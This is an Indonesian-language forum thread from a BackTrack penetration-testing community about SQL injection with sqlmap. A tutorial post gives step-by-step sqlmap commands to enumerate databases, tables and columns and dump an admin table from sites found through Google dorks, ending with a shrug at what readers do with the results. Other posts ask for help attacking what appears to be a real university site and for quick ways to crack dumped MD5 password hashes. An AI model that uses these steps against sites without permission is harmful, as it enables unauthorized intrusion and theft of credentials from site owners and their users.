SQLi Sqlmap.py - Printable Version +- Indonesian Back|Track Team (https://www.indonesianbacktrack.or.id/forum) +-- Forum: Penetration Testing Os (https://www.indonesianbacktrack.or.id/forum/forum-170.html) +--- Forum: Backtrack (https://www.indonesianbacktrack.or.id/forum/forum-171.html) +---- Forum: BackTrack 5 (https://www.indonesianbacktrack.or.id/forum/forum-74.html) +----- Forum: BackTrack 5 tutorial (https://www.indonesianbacktrack.or.id/forum/forum-82.html) +----- Thread: SQLi Sqlmap.py (/thread-713.html) |
RE: SQLi Sqlmap.py - Veronochi - 10-21-2012 @ atas : terserah mau pake Tools buat sendiri dengan menggunakan dan menfaatkan google,bing dan lain-lain atau kunjungi website Search engine yang kamu biasa pakai atau menggunakan BOT yang di taruh di server .. banyak cara untuk cari Bug SQLi atau kamu melakukana Scan Hole dengan Vega ke website dan menemukan Bugs SQLi itu sesuka kamu yang penting kamu mengerti apa yang rusah.,,, RE: SQLi Sqlmap.py - b00mber - 10-28-2012 klo kaya gitu sih ane udah tau bro [ASK] klo nyari halaman admin suatu website melalui backtrak atau yg lain kaya gmana? yg tau mohon kasih tau RE: SQLi Sqlmap.py - xsan-lahci - 10-28-2012 read rulles om bertanya hanya pada pebahasan judul ga boleh out of topic aka OOT RE: SQLi Sqlmap.py - bigbang - 10-29-2012 mantep gannnn .... thx ya ..... RE: SQLi Sqlmap.py - ediyantosuroso - 11-02-2012 para saudara2 sya mohon bantuannya untuk hack ni web solusinya gimana nih? saya menggunakan sqlmap #python sqlmap.py -u http://www.xxx.ac.id/index.php?option=co...Itemid=498 --dbs (enter) ----->ALHASIL KAYAK DI BAWAH INI<----- sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool http://sqlmap.org [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program [*] starting at 13:10:46 [13:10:47] [INFO] testing connection to the target url [13:10:51] [INFO] testing if the url is stable, wait a few seconds [13:10:55] [WARNING] url is not stable, sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on how do you want to proceed? [©ontinue/(s)tring/®egex/(q)uit] c c: command not found [2]+ Stopped python sqlmap.py -u http://www.xxx.ac.id/index.php?option=com_content [2]+ Stopped python sqlmap.py -u http://www.xxx.ac.id/index.php?option=com_content --->Kenapa itu ya brow?? <---- Mohon pencrahanyaa. link ane edit, terlalu frontal @junior RE: SQLi Sqlmap.py - dvil - 11-08-2012 Sql map semua web pada menggunakan md5 apa ada solusinyaa.. RE: SQLi Sqlmap.py - Junior Riau - 11-08-2012 (11-08-2012, 04:24 PM)dvil Wrote: Sql map semua web pada menggunakan md5 solusi apa maksudnya mas?? RE: SQLi Sqlmap.py - dvil - 11-08-2012 (11-08-2012, 04:28 PM)junior.riau18 Wrote:(11-08-2012, 04:24 PM)dvil Wrote: Sql map semua web pada menggunakan md5 gini omjunior rata2 password yang didapatkan sqlmap di enkripsi md5 apa ada toll yang cepet buat decrtypt selain john the ripper :-? RE: SQLi Sqlmap.py - System Error - 11-08-2012 SQLi Sqlmap.py ok kawan-kawan sekalian kali ini w akan berbagi tutorial dengan SQLi menggunakan SQLMAP salah tools pentets yang ada di dalam backtrack... ok langsung aja dari pada lama2.. yang pertama harus di lakukan adalah nyalain laptop/pc lo yang menggunakan backtrack virtual juga boleh... hihihiihih tongue ok serius nie.. 1.buka SQL Map kalian dengan cara Code: Application - Backtrack - Exploitation - Web Exploitation Tools - SqlMAP 2.cari lah target yang sudah kalian temukan celahnya dengan menggunakan google dork... 3.setelah dapet web yang ada celah silakan pentest.. Code: python sqlmap.py -u http://site.com/catalog.php?id=129 --dbs -u = url --dbs = kita mencari nama databasenya... 4.setalah ketemua nama databasenya.. Code: python sqlmap.py -u http://site.com/catalog.php?id=129 -D gatotganteng --tables -D = nama database yang sudah kita temukan tadi --tables = untuk muka isi table.. 5.isi tabel udah keluar dan ada hasilnya ternyata ada table admin kita liat columnsnya... Code: python sqlmap.py http://site.com -D gatotganteng -T Admin --columns Code: pytho sqlmap.py http://site.com -D gatotganteng -T Admin --dump kalo udah begini silakan dah.. mau kalian apain tapi yang jelas w kgk tanggung jawab ya.. wkwkwkkwkwkkwk :ngakak: udah jangan lupa :kasihcendol: wkwkkwkwk salam veronochi dan w hanya mau berbagi kepada orang-orang yang mau belajar... [/font] RE: SQLi Sqlmap.py - achmad_zzz - 11-29-2012 om, saya mau tanya.. gimana caranya sqlmap ke site yang tidak ada "...?id=1" atau sejenisnya.. contoh linknya "127.0.0.1/web/index.php" saya mencoba membuat web di localhost, dan saya coba menggunakan tools ini. bagaimana cara agar mendapatkan databasenya? terimakasih. |